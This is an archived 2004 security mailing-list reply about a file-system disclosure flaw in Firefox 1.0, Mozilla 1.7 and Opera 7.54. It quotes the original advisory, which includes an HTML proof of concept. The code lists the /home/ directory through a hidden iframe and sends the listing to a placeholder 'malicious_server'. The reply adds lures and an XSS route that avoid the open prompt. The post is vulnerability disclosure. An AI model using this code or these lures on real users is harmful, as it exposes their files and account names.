Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:

From: Liu Die Yu (liudieyu_at_umbrella.name)
Date: 12/02/04

  • Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-04:17.procfs" 
    Date: Thu, 02 Dec 2004 09:49:06 +0800
To: badpenguin@zone-h.org

    Target user doesn't need to click the OPEN button:
    1. Cross-site scripting vulnerabilities can get it done(on Mozilla, an
    internet page can't navigate to a local page directly ... but there are
    ways to bypass this restriction).
    2. Ask target to open an HTML file in a remote SMBFS folder - expecting
    him to
    mount -t smbfs [...] /mnt/[...]
    and open "/mnt/[...].html" in Mozilla :-)

    Attacker can *browse* target's folders and files(file content, filename,
    filesize, and even the date).

    ==========

    http://editive.com/referrer

    Giovanni Delvecchio wrote:

    > Title: Disclosure of file system information in Mozilla Firefox and
    > Opera Browser
    >
    > Note:
    > I don't know if it could be considered really a security problem,
    > anyway i'll try to explain my ideas.
    > Sorry for my bad english.
    >
    >
    >
    > Author: Giovanni Delvecchio
    >
    > Bug: Disclosure of file system information
    >
    >
    > Applications affected:
    >
    > - Firefox 1.0
    > - Mozilla 1.7
    > - Opera 7.54 (*)
    >
    > ( maybe also previous versions )
    >
    >
    > Tested versions:
    >
    > - Firefox 1.0 on Linux and Windows
    > - Mozilla 1.7 on Windows
    > - Opera 7.51,..7.54 on Linux
    >
    >
    >
    > Note:
    > The content of this advisory could be applied also to other browsers,
    > i have checked just Mozilla, Firefox,Opera and Microsoft Internet
    > Explorer.
    > Microsoft Internet Explorer seems not to be affected.
    >
    >
    >
    > Bug Description:
    > ================
    > A problem exist in some browsers where a frame can gain access to
    > attributes of another frame or iframe.
    > An application of this bug could be the possibility to disclose local
    > directory structure.
    >
    >
    >
    > PoC:
    > ===
    >
    > ------ begin code.htm -----
    >
    > <html>
    >
    > <body onLoad="
    >
    > list_files='';
    > for(i=0;i<local_files.document.links.length;i++)
    > {list_files+=local_files.document.links.item(i);}
    > alert(list_files);
    > //send list_files at malicious_server
    >
    > document.location.href='http://malicious_server/grab.php?list='+list_files;
    >
    >
    > ">
    >
    > <iframe name="local_files" src="file:///home/" height=0
    > width=0></iframe>
    >
    >
    > </body>
    >
    > </html>
    >
    > ------ end of code.htm -------
    >
    >
    > Impact:
    > ======
    > A malicious server could obtain the content of /home/ directory ( or
    > c:\Document and Setting\ for windows system ) and so know a set of
    > usernames present on system target.
    > Moreover, colud be possible know if a particolar program is installed
    > on target system for a succesive attack.
    >
    > Anyway it cannot be exploited "directly" by a remote site, but only if
    > the page is opened from a local path ( file://localpath/code.htm),
    > since the iframe "local_files" belongs to a local domain.
    >
    > Note: with Internet Explorer code.htm doesn't work even in local.
    >
    >
    >
    > Possible Remote Exploitation:
    > ========================
    >
    > Question:
    > How could a malicious remote user exploit it ?
    >
    > Answer:
    > After that the user "victim" has required
    > http://maliciuos_server/code.htm, if malicious_server responds with a
    > page containing an unknown Content-Type field ( for example text/html.
    > ,note the dot) ,the browser will show a dialog window with some
    > options (open, save, cancel). Choosing "Open" to view this page, it
    > will be downloaded and opened in local ; javascript code will be
    > executed in local context.
    > Obviously, if user chooses to save and after open it the result is equal.
    >
    > (*) For Opera this method of remote exploitation requires that opera
    > must be setted as Default Application in "handler for saved files"
    > whether the user choose "Open" in the dialog window.
    >
    >
    >
    > Solution:
    > ========
    > No solution at the moment
    >
    >
    > Vendor notice
    > ==============
    > 24th November 2004: I have contacted mozilla by security@mozilla.org
    > and Opera by its bug track page at https://bugs.opera.com/wizard/
    >
    > No response from both at the moment.
    >
    >
    >
    >
    > Best regards,
    >
    > Giovanni Delvecchio
    >
    > _________________________________________________________________
    > Personalizza MSN Messenger con sfondi e fotografie!
    > http://www.ilovemessenger.msn.it/
    >
    > .
    >

  • Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-04:17.procfs"